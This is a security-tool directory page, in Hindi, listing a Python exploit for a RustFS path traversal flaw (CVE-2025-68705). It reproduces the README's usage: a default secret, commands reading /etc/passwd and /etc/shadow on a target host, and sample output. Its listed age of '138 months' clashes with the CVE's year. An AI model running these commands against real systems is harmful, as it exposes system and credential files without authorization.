Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-68705 — CVE-2025-68705 के लिए Python एक्सप्लॉइट स्क्रिप्ट, RustFS में एक पथ ट्रैवर्सल कमजोरी, जो लक्ष्य सर्वरों पर मनमाना फ़ाइल पढ़ने और कमजोरी की जाँच को सक्षम बनाती है। | Kitploit
उपकरण/GitHubGitHub/imjdl/cve-2025-68705
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubimjdl/cve-2025-68705

CVE-2025-68705

CVE-2025-68705 के लिए Python एक्सप्लॉइट स्क्रिप्ट, RustFS में एक पथ ट्रैवर्सल कमजोरी, जो लक्ष्य सर्वरों पर मनमाना फ़ाइल पढ़ने और कमजोरी की जाँच को सक्षम बनाती है।

रिपॉजिटरी देखें
138 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-68705 - RustFS पथ पारगमन शोषण

विवरण

यह स्क्रिप्ट RustFS में एक पथ पारगमन भेद्यता (CVE-2025-68705) का शोषण करती है जो सर्वर पर मनमानी फ़ाइलों को पढ़ने की अनुमति देती है।

आवश्यकताएँ

  • Python 3.6+
  • निर्भरताओं के लिए requirements.txt देखें

स्थापना

git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

उपयोग

python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

अनिवार्य तर्क

तर्कविवरण
-H, --hostलक्ष्य होस्ट IP या होस्टनाम
-p, --portलक्ष्य पोर्ट संख्या
-f, --fileपढ़ने के लिए फ़ाइल पथ (--check-only के साथ वैकल्पिक)

वैकल्पिक तर्क

तर्कविवरणडिफ़ॉल्ट
-s, --secretहस्ताक्षर के लिए गुप्त कुंजीrustfsadmin
-o, --offsetफ़ाइल पढ़ने का ऑफ़सेट0
-l, --lengthपढ़ने के लिए बाइट्स की संख्या4096
--check-onlyकेवल यह जाँचें कि लक्ष्य असुरक्षित है या नहीं-

उदाहरण

/etc/passwd फ़ाइल पढ़ें

python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

कस्टम ऑफ़सेट और लंबाई के साथ /etc/shadow पढ़ें

python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

कस्टम गुप्त कुंजी का उपयोग करें

python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

केवल यह जाँचें कि लक्ष्य असुरक्षित है या नहीं

python exp.py -H 192.168.1.128 -p 9000 --check-only

फ़ाइल की विशिष्ट श्रेणी पढ़ें

python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

आउटपुट उदाहरण

python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

संदर्भ

  • RustFS सुरक्षा परामर्श
  • CVE-2025-68705
टूल डाउनलोड करें